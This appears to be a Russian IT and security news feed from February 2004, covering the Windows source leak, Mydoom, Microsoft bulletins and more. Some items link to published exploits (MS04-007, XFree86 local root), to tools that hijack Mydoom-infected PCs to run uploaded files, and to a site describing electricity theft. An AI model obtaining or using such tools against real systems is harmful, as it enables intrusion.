15/02/2004 16:01 Автор "Тетриса" разбогател и теперь работает на Билла Гейтса.
Наверняка компьютерщики со стажем знают старую добрую игрушку под названием "Тетрис", равно как и имя её создателя - Алексея Пажитнова. В "Тетрисе" не нужно мочить пришельцев или грабить банки, это всего лишь простенькая, очаровательная компьютерная игра, от которой совершенно невозможно оторваться. В 1980-е, когда "Тетрис" стал завоевывать мир, на нем делались состояния и из-за него судились. Но и сегодня, 20 лет спустя после создания своего технологического шедевра, автор игры Алексей Пажитнов только начинает зарабатывать на нем. В 1985-м, в Советском Союзе времен холодной войны, создатель одной из самых захватывающих компьютерных игр всех времен подрабатывал в Академии наук. Его коллеги наблюдали за спутниками и рассчитывали сверхдержавность СССР, а Пажитнов отдавал все свободное время своей страсти к головоломкам и человеческой психологии. Меньше двух недель ушло у него на написание кода программы, ставшей "Тетрисом", и куда больше времени он потратил на "тестирование системы". Более подробно об истории создания этой знаменитой игры и судьбе её создателя можно прочитать в статье на сайте BBC.
Подробности - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_3486000/3486853.stm

15/02/2004 15:28 Москва: спецслужбы тоже будут довольны новой услугой «Мегафона».
Скоро в Москве и области вступят в строй системы точного определения местоположения владельцев сотовых телефонов, пишут сегодня “Финансовые Известия”. Операторы мобильной связи считают, что новая услуга будет использоваться чадолюбивыми родителями для определения местоположения их детей и для вызова милиции. Пока открытым остается вопрос о соответствии нововведений декларируемым российским государством правам человека - законы, регламентирующие применение подобных услуг, в России даже не разрабатываются. Тотальную систему слежки пока построить нельзя по техническим причинам - сотовые сети просто не выдержат нагрузки. Но выборочно можно будет определить координаты любого человека, причем сотовый оператор знать об этом не будет, абонент - тем более. Столичные операторы собираются предложить своим абонентам возможность точно знать, где находятся их дети или склонные к неожиданным передвижениям с переодеваниями родственники, считающие, что они "имеют право на личную жизнь". Сотовый оператор "Мегафон" пообещал, что уже в марте услуга будет доступна абонентам, а компании МТС и "Вымпелком" ("Би Лайн") сообщили, что ведут работы над такими проектами и скоро объявят о результатах. Услуга выглядит так: родитель на специальном интернет-сайте прописывает маршрут своего блудливого чада. Например, ребенок в 9.00 должен быть в школе. Если ребенок там не оказался, то на телефон родителя придет SMS-сообщение, что дитя находится на пересечении таких-то улиц. Если у родителя дорогой "навороченный" телефон, то он увидит местонахождение ребенка на карте на дисплее. У самого ребенка телефон может быть самым дешевым. Главное, чтобы он был включен.
Подробнее - http://www.oxpaha.ru/view.asp?11461

15/02/2004 14:47 В Британии создается новое подразделение по борьбе с киберпреступностью.
После довольно долгих дискуссий Британское правительство признало необходимость создания специального подразделения на базе уже существующего Национального Департамента по борьбе с преступлениями в сфере высоких технологий (National Hi-Tech Crime Unit), которое планируется укомплектовать самыми новыми средствами борьбы с преступлениями 21 века. Новое подразделение будет напоминать по своей структуре американское ФБР, и будет называться Агентство по борьбе с тяжкими организованными преступлениями (Serious Organised Crime Agency). Создать подразделение планируется к 2006 году. По заявлениям авторов проекта, в то время как правоохранители борются с традиционными преступлениями, преступники уже давно успешно используют современные информационные технологии, опережая на несколько шагов правоохранителей. Несмотря на это, Великобритания располагает самыми оборудованными и хорошо организованными подразделениями полиции по борьбе с киберпреступностью в мире.
Источник - http://www.crime-research.ru

15/02/2004 13:53 Ещё предположения об источнике похищенных кодов Windows.
Господин под ником _divan_ в своём ЖЖ высказал предположение (небеспочвенное, надо заметить), что исходники Windows были похищены с сайта ftp://circle.mainsoft.com (операционка - Linux), где стоял дырявый FTP-сервер wu-ftpd версии 2.6.1. Судя по всему, часть исходного кода была передана Microsoft для Mainsoft. Данная компания, которая именует себя "the software porting company" получила исходные коды Win NT/2000 в июле 2000-го года, для проэкта MainWin. MainWin - это реализация Win32 API для UNIX систем. Код, скомпилированный под NT, благодаря MainWin должен был без проблем запускаться на UNIX/Linux платформах. Тоесть что-то вроде эмулятора, в котором заинтересована сама M$. Есстественно, эмулятора не open-source-шного. Код, о котором собственно и идёт речь, является лишь частью(хотя и достаточно интересной) исходников Windows, полный обьем которого оценивается в 40 Gb. Это скорее даже часть исходников MainWin, а не Windows - хотя большая часть кода осталась неизменной. В общем, почитайте. Довольно интересный ЖЖ.
Подробности - http://www.livejournal.com/users/_divan_/10349.html?nc=1

15/02/2004 13:20 Париж отказывается от Microsoft.
Вслед за своими коллегами из немецкого Мюнхена, парижские муниципальные власти также всерьез задумались о переходе на Linux. По информации ZDNet France, системный интегратор Unilog подрядился подготовить техническое обоснование пока что гипотетического перехода парижского муниципалитета на программное обеспечение с открытым кодом. В течение трехмесячного срока компания будет считать, во что выльется резкая миграция 17 тысяч компьютеров, используемых в администрации Парижа. Напомним, что в мае этого года благодаря расчетам Unilog, более 14 тысяч мюнхенских компьютеров обзавелись операционной системой SuSE Linux.
Источник - http://www.internet.ru

15/02/2004 12:37 Программист придумал защиту для пользователей пиринговых сетей.
Техасец Уайет Восицек был настолько возмущен агрессивными действиями звукозаписывающей индустрии против серферов, которые бесплатно скачивают музыку, что решил восстановить справедливость. Он создал программу, которая маскирует истинные веб – адреса поклонников файло-обменных программ, подобных Kazaa. Программа AnonX запускает виртуальную частную сеть между компьютером пользователя и машинами компании. AnonX действует, как программа - посредник, но в отличие от прокси-систем не замедляет процесс веб-серфинга. Ежемесячная подписка на «маску» стоит 5,95 долларов. Теоретически никто за пределами AnonX не может знать истинные веб-адреса подписчиков. Это касается и Американской ассоциации звукозаписывающей индустрии (RIAA), которая в рамках судебной кампании принуждает провайдеров «сдавать» информацию о своих клиентах, скачивающих музыку из онлайна. 29-летний Восицек торжественно пообещал, что не станет разглашать персональные сведения его пользователей, количество которых достигло уже 7 тысяч. И никакая сила не сможет заставить его сделать это.
Источник - http://www.runet.ru

15/02/2004 11:40 SCO продолжает работу альтернативного сайта после официального завершения атаки Mydoom.
Подвергшаяся усилиями авторов интернет-червя Mydoom DDoS-атаке компания SCO продолжит работу своего альтернативного сайта в течение еще нескольких дней, сообщает CNET News.com. Решение о продлении функционирования резервного сайта принято несмотря на то, что «официальные» сроки акции, прописанные вирусописателями в коде вредоносной программы, уже прошли. По словам пресс-секретаря SCO Блэйка Стоуэлла (Blake Stowell), основной сайт компании по-прежнему находится под воздействием Mydoom. Атака будет продолжаться еще как минимум несколько дней в силу ряда причин, например, сбитых настроек в датах зараженных компьютеров. «С учетом всех имеющихся у нас показателей становится ясно, что атака не прервется разом сегодня или завтра из-за огромного количества зараженных машин, из-за того, что у большого их количества сбиты настройки календаря и из-за самой природы инфекции», - заявил Стоуэлл.
Источник - http://www.viruslist.com

14/02/2004 16:12 Скоро выйдет ASPLinux 9.2.
оробочные версии дистрибутива ASPLinux 9.2 будут доступны 1 марта 2004 года. В этот же день дистрибутив будет выложен на ftp-сервер компании ASPLinux. Кроме базовой версии дистрибутива, выйдет вариант "LiveCD", возволяющий пользоваться ASPLinux, не устанавливая его на жесткий диск.
Подробности - http://www.asplinux.ru/ru/news/id,52675

14/02/2004 15:57 Спамеры обманывают американских пользователей от имени Федеральной комиссии по торговле.
Федеральная комиссия США по торговле (FTC) обратилась к пользователям с призывом соблюдать бдительность и не поддаваться на ложные заявление администраторов сайта www.unsub.us, обещающих оградить желающих от потока спама. Чиновники призвали владельцев компьютеров не предоставлять свои электронные почтовые адреса, как того просят «мошенники», сообщает Reuters. Несмотря на обещания администраторов www.unsub.us сократить количество спама, поступающего в электронные почтовые ящики, эффект может оказаться диаметрально противоположным: поток писем коммерческого содержания только возрастет. Сайт мошенников использует тот же дизайн и цвета, что и официальный веб-ресурс FTC, открытый для регистрации пользователей в списках так называемых отказников от коммерческой рассылки. «Лучший способ избежать подобных афер - хранить свою персональную информацию, в том числе адреса электронной почты, при себе до тех пор, пока не станет ясно, с кем вы имеете дело», - заявили представители FTC.
Источник - http://www.viruslist.com

14/02/2004 12:29 Обнаружен источник утечки исходников Windows?
Некий bladi из Испании прогнал через отладчик gdb файл /private/security/msv_sspi/core и обнаружил, что этот файл был сгенерирован при помощи команды `vi nlmain.c' (vi - популярный консольный текстовый редактор в UNIX). Дата файла - Aug 3 2001. При прогоне команды strings была обнаружена довольно любопытная информация и машине, на которой, якобы стояла украденная версия Windows: HOSTNAME=voltaire, LOGNAME=eyala, REPLYTO=eyala@mainsoft.com ORGANIZATION=Mainsoft Co. Ltd., PWD=/usr/ms/win2k_sp1/private/security/msv_sspi. Microsoft сотрудничала с Mainsoft еще до начала программы Shared Source (1994 г.). Также выясняется, что, судя по всему, были опубликованы исходники первого сервис-пака для Вынь2К.
Источник - http://www.securityfocus.com

14/02/2004 11:40 Эксплоит уязвимости Windows.
Опубликован исходный текст эксплоита, позволяющего использовать уязвимость в ASN.1, обнаруженном недавно в ОС Windows многих версий. Автор эксплоита - Christophe Devine. Предназначен для компиляции на платформе Windows.
Исходник - http://linuxfromscratch.org/~devine/MS04-007-dos.c

14/02/2004 10:31 Исходники Windows украли не в России.
Корреспондент "Компьюленты" обратился в представительство компании Microsoft в России и СНГ с просьбой прокомментировать ситуацию с кражей исходного кода операционных систем Windows 2000 и Windows NT. Пресс-секретарь московского представительства компании Пётр Суздалев не стал комментировать инцидент, сославшись на официальное сообщение Microsoft, опубликованное вечером 12 февраля. Вопрос о возможности кражи исходного кода Windows сотрудниками одной из компаний или государственных организаций, которым Microsoft предоставляет доступ к исходникам, прокомментировал менеджер по информационной безопасности представительства Microsoft в России Владимир Мамыкин. По его словам, "утечка кода, предоставляемого организациям в рамках программы Government Security Program, абсолютно исключена".
Источник - http://www.compulenta.ru

13/02/2004 13:15 Windows XP сертифицирован на соответствие требованиям безопасности РФ.
Государственная техническая комиссия при президенте РФ и представительство Microsoft в России и СНГ объявили о том, что завершена сертификация операционной системы Microsoft Windows XP Professional (Service Pack 1a) на соответствие российским требованиям по безопасности информации, гармонизированным с международными. Cертификация проводилась в соответствии с методологией международного стандарта ISO 15408. С этой целью было разработано задание по безопасности, прошедшее оценку, и на соответствие которому испытательной лабораторией «Центр безопасности информации» была проведена сертификация операционной системы. При испытаниях были протестированы следующие функции безопасности операционной системы: аудит безопасности; защита данных пользователя; идентификация и аутентификация; управление безопасностью; использование ресурсов; блокирование сеанса. Сертификат №844, выданный по результатам сертификационных испытаний, подтверждает, что операционная система Microsoft Windows XP Professional (Service Pack 1a) соответствует заданию по безопасности MS.Win_XP_SP1a.ЗБ и имеет оценочный уровень доверия ОУД1, усиленный компонентом AVA_SOF.1 (Оценка стойкости функции безопасности). Примечание ньюсмейкера: учитывая новости ниже - звучит, как издевательство. ;)))
Источник - http://www.cnews.ru/newsline/index.shtml?2004/02/13/155132

13/02/2004 13:03 Официальное заявление Microsoft по поводу кражи кода Windows.
На сайте Microsoft опубликовано официальное заявление компании по поводу кражи исходного кода операционных систем Windows 2000 и Windows NT. Текст сообщения Microsoft ранее был недоступен для чтения. Пока официальная реакция Microsoft довольно краткая: "В четверг компании Microsoft стало известно, что часть исходного кода Microsoft Windows 2000 и Windows NT 4.0 была незаконно выложена в открытый доступ в интернете. Публикация исходного кода Microsoft третьими лицами незаконна, и мы рассматриваем этот инцидент со всей серьезностью". "В настоящее время, - говорится далее в заявлении, - мы расследуем случай публикации кода и работаем с представителями правоохранительных органов. В настоящий момент можно утверждать, что кража кода произошла не в результате проникновения в корпоративную сеть Microsoft и не вследствие нарушения режима внутренней безопасности в компании. Также пока нельзя говорить о том, что инцидент как-то может отразиться на клиентах компании. Мы продолжаем следить за развитием ситуации".
Подробности - http://www.microsoft.com/presspass/press/2004/Feb04/02-12windowssource.asp

13/02/2004 12:07 Новая волна червей, использующих последствия эпидемии Mydoom.
Вирусная лаборатория PandaLabs зарегистрировала появление новых червей, связанных с эпидемиями червей Mydoom: Nachi.B (W32/Nachi.B.worm), DoomHunter.A (W32/DoomHunter.A.worm), Deadhat.B (W32/Deadhat.B.worm) и Mitglieder.A (W32/Mitglieder.A.worm). Этому зверинцу как раз и посвящён вышедший сегодня (в довольно знаменательный для всякой нечисти день) бюллетень.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=243

13/02/2004 11:51 SCO продолжает работу альтернативного сайта после официального завершения атаки Mydoom.
Подвергшаяся усилиями авторов интернет-червя Mydoom DDoS-атаке компания SCO продолжит работу своего альтернативного сайта в течение еще нескольких дней, сообщает CNET News.com. Решение о продлении функционирования резервного сайта принято несмотря на то, что «официальные» сроки акции, прописанные вирусописателями в коде вредоносной программы, уже прошли. По словам пресс-секретаря SCO Блэйка Стоуэлла (Blake Stowell), основной сайт компании по-прежнему находится под воздействием Mydoom. Атака будет продолжаться еще как минимум несколько дней в силу ряда причин, например, сбитых настроек в датах зараженных компьютеров. «С учетом всех имеющихся у нас показателей становится ясно, что атака не прервется разом сегодня или завтра из-за огромного количества зараженных машин, из-за того, что у большого их количества сбиты настройки календаря и из-за самой природы инфекции», - заявил Стоуэлл. Спустя некоторое время после появления интернет-червь Mydoom организовал DDoS-атаку на сайт компании SCO. Заложенная в черве функция предусматривала проведение этой атаки в период с 1 по 12 февраля. После 12 февраля нападение должно прекратиться, но зачастую подобные вещи случаются вне спланированного вирусописателями графика. Например, начало атаки на сайт SCO было зафиксировано на 16 часов раньше ожидаемого срока по причине все тех же неверно настроенных системных дат.
Источник - http://www.viruslist.ru

13/02/2004 11:14 Итак. Про исходники Виндов.
в общем так. В ФИДОшной эхе fido7.crack.talks была дана ссылка на якобы выложенные в Интернете исходники Windows. Были опубликованы исходники ОС Win2K, WinNT4. Согласно же сайта бета-тестеров Windows - winbeta.org, был опубликован не полный исходный текст Windows, а GUI (не ядро системы). По слухам с того же сайта исходники занимают 722 страницы. В ФИДО идёт указание на сайт windows.owns.com. На момент опубликования новости лично мне достучаться до сайта не удалось - возможно, повезёт вам.
Подробности - http://www.forumgeeks.com/forum/index.php?showtopic=303

13/02/2004 09:22 Фрагменты исходного кода операционной системы Windoows появились в Интернет.
Радиостанция "Эхо Москвы" сообщила о появлении в Интернет исходного кода операционной системы Windows (какой именно версии - не уточняется). Он является коммерческим секретом "Майкрософта" и в принципе может позволить злоумышленникам изготовить программы, поражающие деятельность некоторых операционных систем семейства Windows, говорят специалисты. Об утечке стало известно в четверг. Хотя на этой неделе это уже второе сообщение. Сейчас ведется расследование. Исходный код был предметом спора между корпорацией и регулирующими организациями в США. "Майкрософт" продолжает настаивать на том, что это - собственность корпорации. Однако после серии нашумевших разбирательств Microsoft согласилась предоставить фрагменты исходного кода некоторым компаниям, правительственным организациям в США и за рубежом, а также университетам. Однако передача данных производится на условиях, исключающих публичное распространение исходного кода.
Источник - http://www.echo.msk.ru

13/02/2004 00:01 Эксплоит уязвимости XFree86.
Опубликован исходный код эксплоита, использующего локальную уязвимость, обнаруженную на днях в XFree86. Как пишет сам автор, тестировалась в ОС RedHat Linux.
Эксплоит - http://www.securityfocus.com/archive/1/353493/2004-02-09/2004-02-15/0

12/02/2004 16:50 Исходники для использования PC, заражённых MyDoom.
Ввиду юольшого количества машин, заражённых червем MyDoom обоих разновидностей французские товарищи по партии решили выложить исходники программ, которые бы могли использовать заражённые машины в "личных" ;) целях - в частности, загружать свои файлы и выполнять их. Первая выпущена господином (или командой?) под ником K-OTik и предназначен для сборки на Windows-платформе. Вторая выпущена французской группой Coromputer и носит название mykralor - при этом имеет функциональное ограничение на размер закачиваемого файла - 1599 байт.
Исходник 1 - http://www.securityfocus.com/archive/1/353325/2004-02-09/2004-02-15/0
Исходник 2 - http://www.coromputer.net/index?m=files&s=1&l=2

12/02/2004 16:38 Sun планирует переписать часть ядра Solaris для увеличения безопасности.
Sun собирается пересмотреть организацию подсистем Solaris с точки зрения безопасности, для введения улучшений, призванных увеличить безопасность, планируется переписать некоторые подсистемы ядра Solaris, сообщает opennet.ru. Данные улучшения будут доступны в Solaris 10 (пересмотр распределения прав доступа, доп. средства ограничения процессов, в том числе привязка процесса к определенному сетевому сервису, Grid Containers - виртуальные ОС в ОС).
Подробности - http://www.eweek.com/article2/0,4149,1518980,00.asp

12/02/2004 15:29 Хакеры от "электротехники".
Хакеры бывают разные. Помимо общепринятого смысла этого слова, можно смело назвать хакерами от электротехники людей, которые различными способами (незаконность которых довольно тяжело подчас как установить, так и доказать) пытаются обмануть РАО "ЕЭС" (привет г-ну Чубайсу) или, если угодно, не дать сильно обмануть себя (диалектика - великая наука). Так вот - подобные люди создали в рунете сайт www.pozitron.ru, на котором приведены 13 способов "хака" электросетей. ;) Примечательно замечание в конце страницы, описывающей подобные способы: "АХТУНГ ! Способы описаны исключительно для повышения квалификации работников Энергосбыта ! Их применение с целью хищения электроэнергии противозаконно". Классная отмазка. :))
Cайт проекта - http://www.Pozitron.ru

12/02/2004 15:11 Смарт-карты как защита доступа.
Под таким заголовком в 1-м номере журнала LAN была опубликована статья Йорга Бахмани. Для действенной защиты виртуальных частных сетей необходимы надежные решения аутентификации. Производители продуктов VPN, как правило, предусматривают интерфейсы для подключения внешних механизмов аутентификации. В статье рассматриваются технологии использования однократных паролей и интеграции с PKI, а также приводятся примеры практической конфигурации.
Статья - http://www.osp.ru/lan/2004/01/077.htm

12/02/2004 14:33 Появились подробности об Office 2003 Service Pack 1.
В Сети появилась новая информация насчёт будущих улучшений в пакете Office 2003. Пакет обновлений Office 2003 SP1, в настоящий момент планируемый к выходу в конце мая, будет включать исправления и улучшения всех приложений пакета, а также серьёзные дополнения в программе InfoPath 2003. Microsoft добавит возможность выбирать специальные управляющие элементы, а на панель управления InfoPath смогут быть добавлены элементы ActiveX. Подробности о том, какие конкретно улучшения будут в приложениях Word и Outlook, пока не распространялись. Ниже приведены скриншоты изменений в InfoPath.
Источник - http://www.cnews.ru

12/02/2004 14:18 Internet Explorer теперь самый безопасный браузер.
В корпорации Microsoft считают, что браузер Internet Explorer ничуть не уступает в безопасности конкурирующим программным продуктам, а кое в чем и превосходит их. Об этом изданию ZDNet UK рассказал директор по безопасности британского подразделения софтверного гиганта Стюарт Окин. По его словам, ни в одном браузере не было заделано столько дыр, сколько в Internet Explorer. То есть в настоящее время безопасность браузера Microsoft значительно выше, чем год или два назад. Что касается последнего патча для Internet Explorer, после установки которого браузер перестает обрабатывать URL со знаком @, использующимся для отделения имени пользователя и пароля от адреса сайта, то он, по словам Окина, был абсолютно необходим. Окин сообщил, что исправляемые им дыры были настолько серьезными, что заплатку пришлось выпускать в срочном порядке, презрев помесячный график. Окин также добавил, что хотя из-за изменений в обработке URL у некоторых пользователей возникли неудобства, ущерб от использования уязвимости злоумышленниками мог оказаться значительно выше. Впрочем, по словам Окина, повышение уровня безопасности Internet Explorer вовсе не означает, что с дырами в программных продуктах Microsoft покончено раз и навсегда.
Источник - http://www.compulenta.ru

12/02/2004 13:56 Microsoft окончательно прекращает поддержку Windows NT.
Как сообщается на сайте VNUNet, поддержка операционной системы Windows NT 4 будет окончательно прекращена компанией Microsoft в течение этого года. Поддержка корпоративной версии NT4 Enerprise Edition будет прекращена 30 июня, в то время как поддержка NT4 Server будет продолжаться до 31 декабря текущего года. Компания Microsoft уже два раза продлевала срок поддержки Windows NT 4, но больше не собирается этого делать. Как заявил Брюс Линн, представитель британского подразделения Microsoft: "Мы расстроим больше клиентов, если продлим поддержку Windows NT". Линн отметил, что вокруг прекращения поддержки NT 4 было много кривотолков, но если компания еще раз продлит сроки, это отрицательно скажется на ее репутации. Кроме того, Линн заявил, что если кто-то слишком долго будет держаться за NT 4, то это не обеспечит ему никаких преимуществ на рынке.
Подробности - http://www.vnunet.com/News/1152685

12/02/2004 13:22 90% Web-приложений потенциально уязвимы.
Лишь около 10% программного обеспечения для работы в интернете можно считать абсолютно защищенными от любых видов киберугроз. Таковы результаты исследований, проводимых в течение 4 последних лет израильской компанией WebCohort, сообщает сайт газеты El Mundo. Согласно выводам израильских специалистов, почти 92% веб-приложений могут оказаться уязвимыми для кибератаки. Испанские коллеги WebCohort из компании Hispasec считают, что приведенная статистика свидетельствует о неспособности большинства компаний защитить свои интернет-ресурсы от действий злоумышленников, а, значит, ведут к существенному риску для пользователей.
Подробности - http://www.elmundo.es/navegante/2004/02/10/seguridad/1076407914.html

12/02/2004 13:04 Английский клуб Windows-отступников.
Местные власти и компании, решившие отказаться от своего проприетарного ПО в пользу ПО с открытым исходным кодом, получили возможность вступить в тайное общество, которое защитит их от опеки таких фирм, как Microsoft. Инициатива The Incubator Club противостоит тактике, которую используют некоторые крупные производители ПО против фирм и организаций, планирующих переход на Linux. По словам Эдди Близдейла из ИТ-консалтинговой фирмы Netproject, организовавшей The Incubator Club, Microsoft неоднократно пыталась положить конец потенциальным миграциям на Linux — иногда добиваясь ощутимого успеха. «Всякий раз, когда мы сообщаем о намерении клиента перейти на Linux, к нему является Microsoft и делает выгодное предложение за отказ от этой идеи», — сказал Близдейл во вторник на конференции Open Source in Local Government в Лондоне. Он рассказал, что The Incubator Club — это форум, где директора по ИТ обмениваются мнениями и опытом по поводу перехода на open-source и где можно ставить проблемы и решать их. Компании, вошедшие в The Incubator Club, смогут испытать Secure Open Desktop Architecture — пилотную версию настольной Linux от Netproject. В SODA используются смарткарты, которые вставляются в «бесхозные» ПК под Linux, что позволяет пользователям переходить от компьютера к компьютеру, не перезагружая системы и не сталкиваясь с проблемами безопасности, характерными для среды Windows.
Подробности - http://www.zdnet.ru/?ID=313694

12/02/2004 12:46 Компания Intel изобрела "лазерный модем".
Компания Intel объявила об изобретении нового вида компьютерных чипов, которые способны переключать световые сигналы. По мнению ученых, эта разработка может означать революцию в сфере компьютерных технологий. Об изобретении рассказывается в выходящем в четверг выпуске американского журнала Nature. Традиционно в компьютерном оборудовании кремниевые блоки в микросхемах отвечали за переключение электрических сигналов. Новая разработка Intel базируется на технологии, позволяющей использовать кремниевые блоки для переключения не электрических, а световых сигналов. Это означает, что скорость передачи данных между разными компонентами оборудования может быть увеличена в несколько десятков или сотен раз (представляемая микросхема - прототип оптического модулятора, позволяющий, модулируя лазерный луч, передавать данные со скоростью 2 гигабайта в секунду). По мнению специалистов, в сочетании с оптическими сетями передачи данных из таких чипов можно создавать вычислительное оборудование, разные компоненты которого могут находиться друг от друга на большом расстоянии. Кроме того, за счет огромной скорости передачи данных при использовании изобретенного в Intel оборудования может быть существенно увеличена пропускная способность каналов связи.
Источник - http://www.lenta.ru

11/02/2004 19:09 Лучшая защита - нападение.
Система защиты беспроводных локальных сетей Red-Detect, созданная в компании Red-M, позволяет давать отпор хакерам, пытающимся нелегально подключить к сети посторонние устройства. Идентификация выполняется при помощи сети радиозондов, развертываемой параллельно защищаемой WLAN и сканирующей эфир на наличие посторонних сигналов. Red-Detect можно использовать совместно с предлагаемой Red-M системой распознавания вторжений и управления безопасностью Red-Vision, которая позволяют осуществлять мониторинг крупных многосегментных сетей Wi-Fi. "Идентифицировав постороннего, радиозонды передают сигнал тревоги на консоль администратора, - объясняет глава Red-M Карл Фейдлер. - Тот имеет возможность нанести ответный удар: зонды способны 'заглушить' сигнал нелегального устройства, одновременно позволяя следить за дальнейшими действиями хакера".
Источник - http://www.osp.ru

11/02/2004 18:33 В ПО от Microsoft еще 7 неисправленных уязвимостей.
Компания EEye, специалисты которой еще более полугода назад обнаружили критическую уязвимость в Windows, «заплатку» для которой вчера выпустил Microsoft, заявляет о том, что в ПО софтверного гиганта остаются еще семь неисправленных «дыр», три из которых представляют «высокий» уровень критичности. По словам экспертов EЕye, они сообщили Microsoft еще о семи найденных уязвимостях, причем о двух, высокого уровня критичности – еще пять месяцев назад, 10 сентября (с тех пор прошло 94 дня). Отчет о третьей серьезной уязвимости был направлен разработчикам Windows еще через месяц (66 дней назад).На сайте EЕye приводится весь список «дыр», которые Microsoft еще не успел исправить. Сами уязвимости не описываются, чтобы не провоцировать вирусописателей, приведена лишь степень их критичности и дата, когда отчет о «дыре» был направлен Microsoft. EEye – одна из многих компаний, работающих в сфере информационной безопасности и сообщающих Microsoft об уязвимостях, найденных в программных продуктах корпорации. Однако немногие эксперты рискуют сообщать широкой публике о том, насколько быстро разработчик реагирует на найденные ими уязвимости - чтобы не вызывать негативной реакции программных вендоров. Да... Похоже, что февраль - явно не месяц M$.
Источник - http://www.securitylab.ru

11/02/2004 18:20 И ещё 2 бюллетеня от M$.
Как-то сразу я не заметил, теперь исправляю ошибку. Итак, до бюллетеня MS04-007, о котором мы написали ранее были (естественно) выпущены ещё 2 бюллетеня - MS04-005/006. В первом описывается уязвимость в популярном ПО для создания виртуальной машины VirtualPC для платформы Mac. Уязвимость связана с некорректными полномочиями при создании временных файлов - обнаружена @stake, Inc. Патч выпущен. Второй бюллетень - MS04-006 посвящён уязвимости в сервисе WINS, который предназначен для преобразования NetBIOS-имён в IP-адреса. Уязвимости подвержены сервера под управлением Win NT/2K/2003 с запущенной службой WINS. Особенную опасность представляет уязвимость для 2003. В качестве временной меры предлагается блокировать порты 42/TCP и 137/UDP на файрволле, а также удаление самой службы. Патч также доступен.
MS04-005 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS04-005.asp
MS04-006 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS04-006.asp

11/02/2004 15:33 Уязвимость в XFree86.
Известная секьюрити-компания iDEFENSE сообщила о наличии уязвимости популярного в мире открытых систем X-сервера c набором утилит XFree86. "Плюха" обнаружена в механизме разбора файла алиасов шрифтов под названием 'font.alias'. Для осуществления своих мерзких планов злодей должен создать специальный файл 'font.alias'. Уязвимость скрыта в функции ReadFontAlias() файла /xc/lib/font/fontfile/dirfile.c. Переменная char alias[MAXFONTNAMELEN] задаёт длину буфера в 1024 символа. При дальнейшем разборе функцией strcpy переменная lexToken может принять значение, превыщуе эту величину. При этом происходит типичное переполнение буфера с возможностью локального получения прав суперюзверя. Приводится пример эксплоита. Естественно, необходимо иметь локальный доступ на уязвимую машину, либо возможность удалённого выполнения команд Иксов. Патч выпущен.
Подробности - http://www.idefense.com/application/poi/display?id=72

11/02/2004 14:26 Microsoft советует пользователям Windows удалить из своих систем "Антивирус Касперского"!
Вот такая вот занятная (если не сказать ошеломляющая!) новость. На сайте Microsoft сказано прямым текстом, что если Вы пытаетесь получить доступ к сетевым ресурсам (как-то: сетевым папкам, другим компьютерам в "Сетевом окружении") и при этом компьютер начинает очень сильно тормозить или выдавать сообщение "Not Responding", виноват в этом не кто иной, как Антивирус Касперского! Для решения проблемы рекомендуют удалить этот антивирус из системы. В качестве примера приводятся ОС Windows XP обоих версий.
Подробности - http://support.microsoft.com/default.aspx?scid=kb;en-us;294756&Product=winxp

11/02/2004 14:13 VeriSign: онлайновая преступность прогрессирует.
По данным американского интернет-провайдера VeriSign, в период рожденственских праздников 2003 года объем продаж онлайновых магазинов вырос на 59% по сравнению с аналогичным периодом 2002 года. Только по каналам VeriSign прошло сделок на $6,4 млрд. с 1 ноября по 31 декабря. При этом активность хакеров выросла, по мнению специалистов, на 176% - эти данные получены посредством анализа отчетов корпоративных межсетевых экранов и систем предотвращения атак. Около 7% сделок по покупке товаров в интернет-магазинах не было завершено, поскольку продавцам показались подозрительными номера кредитных карт или идентификация покупателей.
Источник - http://www.cnews.ru

11/02/2004 13:50 С помощью Doomjuice авторы MyDoom заметают следы.
Распространение сетевого червя Doomjuice через компьютеры, ранее зараженные версиями интернет-червя MyDoom, является попыткой вирусописателей замести следы. Такое мнение высказали представители компаний, производящих антивирусное программное обеспечение. Возможно, автор Doomjuice рассчитывает скрыться в общей массе пользователей, с чьих компьютеров происходит рассылка его вредоносной программы, или надеется, что другие вирусописатели осложнят работу следствия, создав дополнительные модификации червя. «Если он распространил свою программу в сети среди обычных пользователей, чтобы скрыться в их рядах, то мы имеем дело с человеком более коварным, чем обычные вирусописатели», - считают эксперты «Лаборатории Касперского», с которыми солидарны представители Network Associates и Sophos. Обнаружение в тексте Doomjuice кода MyDoom дает основания полагать, что обе вредоносные программы созданы одним и тем же человеком или группой людей. Подтверждением этой догадки служит слово andy, также обнаруженное в обоих червях.
Источник - http://www.viruslist.ru

11/02/2004 13:36 Бюллетень по безопасности от Microsoft.
Вышедший вчера бюллетнь по безопасности от Microsoft MS04-007 описывает брешь в операционных системах Windows NT (все версии), 2000, XP (включая 64-разрядный вариант) и Server 2003 (также включая 64-разрядный вариант). Причем дыра, о которой идет речь, была найдена сотрудниками компании eEye Digital Security еще полгода назад, однако руководству софтверного гиганта удалось убедить экспертов не разглашать информацию об уязвимости, с тем чтобы производители смогли выпустить заплатку. Проблема связана с прорехой в библиотеке ASN.1 (Abstract Syntax Notation 1), которая используется при передаче данных по телекоммуникационным протоколам. Спровоцировав ошибку переполнения буфера, злоумышленник может получить доступ к компьютеру с привилегиями системного администратора. После этого на удаленной машине можно выполнять абсолютно любые действия, в том числе, устанавливать произвольное программное обеспечение, просматривать, редактировать и удалять персональные данные, создавать новые учетные записи и т.д. Как отмечают сотрудники eEye Digital Security, ошибка в библиотеке ASN.1 является наиболее опасной из всех, что были обнаружены в продукции Microsoft за последнее время. В связи с этим софтверный гигант рекомендует немедленно загрузить патч, доступный на официальном сайте разработчиков.
Подробности - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS04-007.asp

11/02/2004 13:12 Microsoft обнаружила "критическую" ошибку в Windows.
